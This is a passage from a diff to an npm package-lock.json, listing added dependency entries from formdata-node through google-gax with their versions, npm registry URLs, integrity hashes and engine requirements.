"sha512-qfqtYan3rxrnCk1VYaA4H+Ms9xdpPqvLZa6xmMgFvhO32x7/3J/ExcTd6qpxM0vH2GdMI+poehyBZvqfMTto8A==" + }, + "node_modules/formdata-node": { + "version": "4.3.2", + "resolved": "https://registry.npmjs.org/formdata-node/-/formdata-node-4.3.2.tgz", + "integrity": "sha512-k7lYJyzDOSL6h917favP8j1L0/wNyylzU+x+1w4p5haGVHNlP58dbpdJhiCUsDbWsa9HwEtLp89obQgXl2e0qg==", + "dependencies": { + "node-domexception": "1.0.0", + "web-streams-polyfill": "4.0.0-beta.1" + }, + "engines": { + "node": ">= 12.20" + } + }, + "node_modules/formidable": { + "version": "1.2.6", + "resolved": "https://registry.npmjs.org/formidable/-/formidable-1.2.6.tgz", + "integrity": "sha512-KcpbcpuLNOwrEjnbpMC0gS+X8ciDoZE1kkqzat4a8vrprf+s9pKNQ/QIwWfbfs4ltgmFl3MD177SNTkve3BwGQ==", + "deprecated": "Please upgrade to latest, formidable@v2 or formidable@v3! Check these notes: https://bit.ly/2ZEqIau", + "funding": { + "url": "https://ko-fi.com/tunnckoCore/commissions" + } + }, + "node_modules/formik": { + "version": "2.2.9", + "resolved": "https://registry.npmjs.org/formik/-/formik-2.2.9.tgz", + "integrity": "sha512-LQLcISMmf1r5at4/gyJigGn0gOwFbeEAlji+N9InZF6LIMXnFNkO42sCI8Jt84YZggpD4cPWObAZaxpEFtSzNA==", + "dev": true, + "funding": [ + { + "type": "individual", + "url": "https://opencollective.com/formik" + } + ], + "dependencies": { + "deepmerge": "^2.1.1", + "hoist-non-react-statics": "^3.3.0", + "lodash": "^4.17.21", + "lodash-es": "^4.17.21", + "react-fast-compare": "^2.0.1", + "tiny-warning": "^1.0.2", + "tslib": "^1.10.0" + }, + "peerDependencies": { + "react": ">=16.8.0" + } + }, + "node_modules/formik/node_modules/deepmerge": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-2.2.1.tgz", + "integrity": "sha512-R9hc1Xa/NOBi9WRVUWg19rl1UB7Tt4kuPd+thNJgFZoxXsTz7ncaPaeIm+40oSGuP33DfMb4sZt1QIGiJzC4EA==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/formik/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "node_modules/forwarded": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/forwarded/-/forwarded-0.2.0.tgz", + "integrity": "sha512-buRG0fpBtRHSTCOASe6hD258tEubFoRLb4ZNA6NxMVHNw2gOcwHo9wyablzMzOA5z9xA9L1KNjk/Nt6MT9aYow==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/fraction.js": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/fraction.js/-/fraction.js-4.3.6.tgz", + "integrity": "sha512-n2aZ9tNfYDwaHhvFTkhFErqOMIb8uyzSQ+vGJBjZyanAKZVbGUQ1sngfk9FdkBw7G26O7AgNjLcecLffD1c7eg==", + "dev": true, + "engines": { + "node": "*" + }, + "funding": { + "type": "patreon", + "url": "https://github.com/sponsors/rawify" + } + }, + "node_modules/fragment-cache": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/fragment-cache/-/fragment-cache-0.2.1.tgz", + "integrity": "sha512-GMBAbW9antB8iZRHLoGw0b3HANt57diZYFO/HL1JGIC1MjKrdmhxvrJbupnVvpys0zsz7yBApXdQyfepKly2kA==", + "dev": true, + "dependencies": { + "map-cache": "^0.2.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/freegeoip": { + "resolved": "services/freegeoip", + "link": true + }, + "node_modules/fresh": { + "version": "0.5.2", + "resolved": "https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz", + "integrity": "sha1-PYyt2Q2XZWn6g1qx+OSyOhBWBac=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/fs-constants": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs-constants/-/fs-constants-1.0.0.tgz", + "integrity": "sha512-y6OAwoSIf7FyjMIv94u+b5rdheZEjzR63GTyZJm5qh4Bi+2YgwLCcI/fPFZkL5PSixOt6ZNKm+w+Hfp/Bciwow==" + }, + "node_modules/fs-extra": { + "version": "10.0.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-10.0.0.tgz", + "integrity": "sha512-C5owb14u9eJwizKGdchcDUQeFtlSHHthBk8pbX9Vc1PFZrLombudjDnNns88aYslCyF6IY5SUw3Roz6xShcEIQ==", + "dev": true, + "dependencies": { + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/fs-minipass": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", + "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", + "dependencies": { + "minipass": "^3.0.0" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/fs-mkdirp-stream": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/fs-mkdirp-stream/-/fs-mkdirp-stream-2.0.1.tgz", + "integrity": "sha512-UTOY+59K6IA94tec8Wjqm0FSh5OVudGNB0NL/P6fB3HiE3bYOY3VYBGijsnOHNkQSwC1FKkU77pmq7xp9CskLw==", + "dev": true, + "dependencies": { + "graceful-fs": "^4.2.8", + "streamx": "^2.12.0" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/fs-monkey": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/fs-monkey/-/fs-monkey-1.0.3.tgz", + "integrity": "sha512-cybjIfiiE+pTWicSCLFHSrXZ6EilF30oh91FDP9S2B051prEa7QWfrVTQm10/dDpswBDXZugPa1Ogu8Yh+HV0Q==", + "dev": true + }, + "node_modules/fs-readdir-recursive": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/fs-readdir-recursive/-/fs-readdir-recursive-1.1.0.tgz", + "integrity": "sha512-GNanXlVr2pf02+sPN40XN8HG+ePaNcvM0q5mZBd668Obwb0yD5GiUbZOFgwn8kGMY6I3mdyDJzieUy3PTYyTRA==", + "dev": true + }, + "node_modules/fs.realpath": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", + "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=" + }, + "node_modules/fsevents": { + "version": "2.3.2", + "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", + "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", + "dev": true, + "hasInstallScript": true, + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": "^8.16.0 || ^10.6.0 || >=11.0.0" + } + }, + "node_modules/function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/function.prototype.name": { + "version": "1.1.6", + "resolved": "https://registry.npmjs.org/function.prototype.name/-/function.prototype.name-1.1.6.tgz", + "integrity": "sha512-Z5kx79swU5P27WEayXM1tBi5Ze/lbIyiNgU3qyXUOf9b2rgXYyF9Dy9Cx+IQv/Lc8WCG6L82zwUPpSS9hGehIg==", + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.2.0", + "es-abstract": "^1.22.1", + "functions-have-names": "^1.2.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/functional-red-black-tree": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/functional-red-black-tree/-/functional-red-black-tree-1.0.1.tgz", + "integrity": "sha512-dsKNQNdj6xA3T+QlADDA7mOSlX0qiMINjn0cgr+eGHGsbSHzTabcIogz2+p/iqP1Xs6EP/sS2SbqH+brGTbq0g==", + "dev": true + }, + "node_modules/functions-have-names": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/functions-have-names/-/functions-have-names-1.2.3.tgz", + "integrity": "sha512-xckBUXyTIqT97tq2x2AMb+g163b5JFysYk0x4qxNFwbfQkmNZoiRHb6sPzI9/QV33WeuvVYBUIiD4NzNIyqaRQ==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/fuse.js": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/fuse.js/-/fuse.js-3.6.1.tgz", + "integrity": "sha512-hT9yh/tiinkmirKrlv4KWOjztdoZo1mx9Qh4KvWqC7isoXwdUY3PNWUxceF4/qO9R6riA2C29jdTOeQOIROjgw==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/gauge": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/gauge/-/gauge-3.0.2.tgz", + "integrity": "sha512-+5J6MS/5XksCuXq++uFRsnUd7Ovu1XenbeuIuNRJxYWjgQbPuFhT14lAvsWfqfAmnwluf1OwMjz39HjfLPci0Q==", + "dependencies": { + "aproba": "^1.0.3 || ^2.0.0", + "color-support": "^1.1.2", + "console-control-strings": "^1.0.0", + "has-unicode": "^2.0.1", + "object-assign": "^4.1.1", + "signal-exit": "^3.0.0", + "string-width": "^4.2.3", + "strip-ansi": "^6.0.1", + "wide-align": "^1.1.2" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/gaxios": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-5.0.2.tgz", + "integrity": "sha512-TjtV2AJOZoMQqRYoy5eM8cCQogYwazWNYLQ72QB0kwa6vHHruYkGmhhyrlzbmgNHK1dNnuP2WSH81urfzyN2Og==", + "dependencies": { + "extend": "^3.0.2", + "https-proxy-agent": "^5.0.0", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.7" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/gcp-metadata": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-5.3.0.tgz", + "integrity": "sha512-FNTkdNEnBdlqF2oatizolQqNANMrcqJt6AAYt99B3y1aLLC8Hc5IOBb+ZnnzllodEEf6xMBp6wRcBbc16fa65w==", + "dependencies": { + "gaxios": "^5.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/generic-pool": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/generic-pool/-/generic-pool-2.5.4.tgz", + "integrity": "sha1-OMYYhRPhQDCUjsblz2VSPZd5KZs=", + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/gensync": { + "version": "1.0.0-beta.2", + "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", + "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", + "dev": true, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/get-caller-file": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", + "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", + "engines": { + "node": "6.* || 8.* || >= 10.*" + } + }, + "node_modules/get-func-name": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/get-func-name/-/get-func-name-2.0.2.tgz", + "integrity": "sha512-8vXOvuE167CtIc3OyItco7N/dpRtBbYOsPsXCz7X/PMnlGjYjSGuZJgM1Y7mmew7BKf9BqvLX2tnOVy1BBUsxQ==", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/get-intrinsic": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.2.4.tgz", + "integrity": "sha512-5uYhsJH8VJBTv7oslg4BznJYhDoRI6waYCxMmCdnTrcCrHA/fCFKoTFz2JKKE0HdDFUF7/oQuhzumXJK7paBRQ==", + "dependencies": { + "es-errors": "^1.3.0", + "function-bind": "^1.1.2", + "has-proto": "^1.0.1", + "has-symbols": "^1.0.3", + "hasown": "^2.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/get-package-type": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", + "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/get-port": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/get-port/-/get-port-5.1.1.tgz", + "integrity": "sha512-g/Q1aTSDOxFpchXC4i8ZWvxA1lnPqx/JHqcpIw0/LX9T8x/GBbi6YnlN5nhaKIFkT8oFsscUKgDJYxfwfS6QsQ==", + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/get-stream": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-5.2.0.tgz", + "integrity": "sha512-nBF+F1rAZVCu/p7rjzgA+Yb4lfYXrpl7a6VmJrU8wF9I1CKvP/QwPNZHnOlwbTkY6dvtFIzFMSyQXbLoTQPRpA==", + "dev": true, + "dependencies": { + "pump": "^3.0.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/get-symbol-description": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/get-symbol-description/-/get-symbol-description-1.0.2.tgz", + "integrity": "sha512-g0QYk1dZBxGwk+Ngc+ltRH2IBp2f7zBkBMBJZCDerh6EhlhSR6+9irMCuT/09zD6qkarHUSn529sK/yL4S27mg==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.5", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/get-value": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/get-value/-/get-value-2.0.6.tgz", + "integrity": "sha512-Ln0UQDlxH1BapMu3GPtf7CuYNwRZf2gwCuPqbyG6pB8WfmFpzqcy4xtAaAMUhnNqjMKTiCPZG2oMT3YSx8U2NA==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/getopts": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/getopts/-/getopts-2.3.0.tgz", + "integrity": "sha512-5eDf9fuSXwxBL6q5HX+dhDj+dslFGWzU5thZ9kNKUkcPtaPdatmUFKwHFrLb/uf/WpA4BHET+AX3Scl56cAjpA==" + }, + "node_modules/getos": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/getos/-/getos-3.2.1.tgz", + "integrity": "sha512-U56CfOK17OKgTVqozZjUKNdkfEv6jk5WISBJ8SHoagjE6L69zOwl3Z+O8myjY9MEW3i2HPWQBt/LTbCgcC973Q==", + "dev": true, + "dependencies": { + "async": "^3.2.0" + } + }, + "node_modules/getpass": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", + "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", + "dependencies": { + "assert-plus": "^1.0.0" + } + }, + "node_modules/getpass/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/giget": { + "version": "1.2.5", + "resolved": "https://registry.npmjs.org/giget/-/giget-1.2.5.tgz", + "integrity": "sha512-r1ekGw/Bgpi3HLV3h1MRBIlSAdHoIMklpaQ3OQLFcRw9PwAj2rqigvIbg+dBUI51OxVI2jsEtDywDBjSiuf7Ug==", + "dev": true, + "license": "MIT", + "dependencies": { + "citty": "^0.1.6", + "consola": "^3.4.0", + "defu": "^6.1.4", + "node-fetch-native": "^1.6.6", + "nypm": "^0.5.4", + "pathe": "^2.0.3", + "tar": "^6.2.1" + }, + "bin": { + "giget": "dist/cli.mjs" + } + }, + "node_modules/glob": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.0.tgz", + "integrity": "sha512-lmLf6gtyrPq8tTjSmrO94wBeQbFR3HbLHbuyD69wuyQkImp2hWqMGB47OX65FBkPffO641IP9jWa1z4ivqG26Q==", + "dependencies": { + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^3.0.4", + "once": "^1.3.0", + "path-is-absolute": "^1.0.0" + }, + "engines": { + "node": "*" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/glob-parent": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz", + "integrity": "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==", + "dev": true, + "dependencies": { + "is-glob": "^4.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/glob-stream": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/glob-stream/-/glob-stream-8.0.0.tgz", + "integrity": "sha512-CdIUuwOkYNv9ZadR3jJvap8CMooKziQZ/QCSPhEb7zqfsEI5YnPmvca7IvbaVE3z58ZdUYD2JsU6AUWjL8WZJA==", + "dev": true, + "dependencies": { + "@gulpjs/to-absolute-glob": "^4.0.0", + "anymatch": "^3.1.3", + "fastq": "^1.13.0", + "glob-parent": "^6.0.2", + "is-glob": "^4.0.3", + "is-negated-glob": "^1.0.0", + "normalize-path": "^3.0.0", + "streamx": "^2.12.5" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/glob-stream/node_modules/glob-parent": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", + "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", + "dev": true, + "dependencies": { + "is-glob": "^4.0.3" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/glob-to-regexp": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/glob-to-regexp/-/glob-to-regexp-0.4.1.tgz", + "integrity": "sha512-lkX1HJXwyMcprw/5YUZc2s7DrpAiHB21/V+E1rHUrVNokkvB6bqMzT0VfV6/86ZNabt1k14YOIaT7nDvOX3Iiw==", + "dev": true + }, + "node_modules/global": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/global/-/global-4.4.0.tgz", + "integrity": "sha512-wv/LAoHdRE3BeTGz53FAamhGlPLhlssK45usmGFThIi4XqnBmjKQ16u+RNbP7WvigRZDxUsM0J3gcQ5yicaL0w==", + "dev": true, + "dependencies": { + "min-document": "^2.19.0", + "process": "^0.11.10" + } + }, + "node_modules/global-dirs": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/global-dirs/-/global-dirs-3.0.0.tgz", + "integrity": "sha512-v8ho2DS5RiCjftj1nD9NmnfaOzTdud7RRnVd9kFNOjqZbISlx5DQ+OrTkywgd0dIt7oFCvKetZSHoHcP3sDdiA==", + "dev": true, + "dependencies": { + "ini": "2.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/global-dirs/node_modules/ini": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ini/-/ini-2.0.0.tgz", + "integrity": "sha512-7PnF4oN3CvZF23ADhA5wRaYEQpJ8qygSkbtTXWBeXWXmEVRXK+1ITciHWwHhsjv1TmW0MgacIv6hEi5pX5NQdA==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/global-modules": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/global-modules/-/global-modules-2.0.0.tgz", + "integrity": "sha512-NGbfmJBp9x8IxyJSd1P+otYK8vonoJactOogrVfFRIAEY1ukil8RSKDz2Yo7wh1oihl51l/r6W4epkeKJHqL8A==", + "dev": true, + "peer": true, + "dependencies": { + "global-prefix": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/global-prefix": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/global-prefix/-/global-prefix-3.0.0.tgz", + "integrity": "sha512-awConJSVCHVGND6x3tmMaKcQvwXLhjdkmomy2W+Goaui8YPgYgXJZewhg3fWC+DlfqqQuWg8AwqjGTD2nAPVWg==", + "dev": true, + "peer": true, + "dependencies": { + "ini": "^1.3.5", + "kind-of": "^6.0.2", + "which": "^1.3.1" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/global-prefix/node_modules/which": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/which/-/which-1.3.1.tgz", + "integrity": "sha512-HxJdYWq1MTIQbJ3nw0cqssHoTNU267KlrDuGZ1WYlxDStUtKUhOaJmh112/TZmHxxUfuJqPXSOm7tDyas0OSIQ==", + "dev": true, + "peer": true, + "dependencies": { + "isexe": "^2.0.0" + }, + "bin": { + "which": "bin/which" + } + }, + "node_modules/globals": { + "version": "11.12.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", + "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/globalthis": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/globalthis/-/globalthis-1.0.3.tgz", + "integrity": "sha512-sFdI5LyBiNTHjRd7cGPWapiHWMOXKyuBNX/cWJ3NfzrZQVa8GI/8cofCl74AOVqq9W5kNmguTIzJ/1s2gyI9wA==", + "dependencies": { + "define-properties": "^1.1.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/globby": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-5.0.0.tgz", + "integrity": "sha1-69hGZ8oNuzMLmbz8aOrCvFQ3Dg0=", + "dependencies": { + "array-union": "^1.0.1", + "arrify": "^1.0.0", + "glob": "^7.0.3", + "object-assign": "^4.0.1", + "pify": "^2.0.0", + "pinkie-promise": "^2.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/globby/node_modules/arrify": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/arrify/-/arrify-1.0.1.tgz", + "integrity": "sha1-iYUI2iIm84DfkEcoRWhJwVAaSw0=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/globjoin": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/globjoin/-/globjoin-0.1.4.tgz", + "integrity": "sha512-xYfnw62CKG8nLkZBfWbhWwDw02CHty86jfPcc2cr3ZfeuK9ysoVPPEUxf21bAD/rWAgk52SuBrLJlefNy8mvFg==", + "dev": true, + "peer": true + }, + "node_modules/google-auth-library": { + "version": "7.14.1", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-7.14.1.tgz", + "integrity": "sha512-5Rk7iLNDFhFeBYc3s8l1CqzbEBcdhwR193RlD4vSNFajIcINKI8W8P0JLmBpwymHqqWbX34pJDQu39cSy/6RsA==", + "dependencies": { + "arrify": "^2.0.0", + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "fast-text-encoding": "^1.0.0", + "gaxios": "^4.0.0", + "gcp-metadata": "^4.2.0", + "gtoken": "^5.0.4", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/google-auth-library/node_modules/gaxios": { + "version": "4.3.2", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-4.3.2.tgz", + "integrity": "sha512-T+ap6GM6UZ0c4E6yb1y/hy2UB6hTrqhglp3XfmU9qbLCGRYhLVV5aRPpC4EmoG8N8zOnkYCgoBz+ScvGAARY6Q==", + "dependencies": { + "abort-controller": "^3.0.0", + "extend": "^3.0.2", + "https-proxy-agent": "^5.0.0", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/google-auth-library/node_modules/gcp-metadata": { + "version": "4.3.1", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-4.3.1.tgz", + "integrity": "sha512-x850LS5N7V1F3UcV7PoupzGsyD6iVwTVvsh3tbXfkctZnBnjW5yu5z1/3k3SehF7TyoTIe78rJs02GMMy+LF+A==", + "dependencies": { + "gaxios": "^4.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/google-auth-library/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/google-auth-library/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/google-gax": { + "version": "4.3.5", + "resolved": "https://registry.npmjs.org/google-gax/-/google-gax-4.3.5.tgz", + "integrity": "sha512-zXRSGgHp33ottCQMdYlKEFX/MhWkzKVX5P3Vpmx+DW6rtseLILzp3V0YV5Rh4oQzzkM0BH9+nJIyX01EUgmd3g==", + "dependencies": { + "@grpc/grpc-js": "~1.10.3", + "@grpc/proto-loader": "^0.7.0", + "@types/long": "^4.0.0", + "abort-controller": "^3.0.0", + "duplexify": "^4.0.0", + "google-auth-library": "^9.3.0", + "node-fetch": "^2.6.1", + "object-hash": "^3.0.0", + "proto3-json-serializer": "^2.0.0", + "protobufjs": "7.3.0", + "retry-request": "^7.0.0", + "uuid": "^9.0.1" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/google-gax/node_modules/@grpc/grpc-js": { + "version": "1.10.11", + "resolved": "https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.10.11.tgz", + "integrity": "sha512-3RaoxOqkHHN2c05bwtBNVJmOf/UwMam0rZYtdl7dsRpsvDwcNpv6LkGgzltQ7xVf822LzBoKEPRvf4D7+xeIDw==", + "dependencies": { + "@grpc/proto-loader": "^0.7.13", + "@js-sdsl/ordered-map": "^4.4.2" + }, + "engines": { + "node": ">=12.10.0" + } + }, + "node_modules/google-gax/node_modules/agent-base": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.1.tgz", + "integrity": "sha512-H0TSyFNDMomMNJQBn8wFV5YC/2eJ+VXECwOadZJT554xP6cODZHPX3H9QMQECxvrgiSOP1pHjy1sMWQVYJOUOA==", + "dependencies": { + "debug": "^4.3.4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/google-gax/node_modules/debug": { + "version": "4.3.5", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.5.tgz", + "integrity": "sha512-pt0bNEmneDIvdL1Xsd9oDQ/wrQRkXDT4AUWlNZNPKvW5x/jyO9VFXkJUP07vQ2upmw5PlaITaPKc31jK13V+jg==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/google-gax/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/google-gax/node_modules/gaxios": { + "version": "6.6.0", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-6.6.0.tgz", + "integrity": "sha512-bpOZVQV5gthH/jVCSuYuokRo2bTKOcuBiVWpjmTn6C5Agl5zclGfTljuGsQZxwwDBkli+YhZhP4TdlqTnhOezQ==", + "dependencies": { + "extend": "^3.0.2", + "https-proxy-agent": "^7.0.1", + "is-stream": "^2.0.0", + "node-fetch": 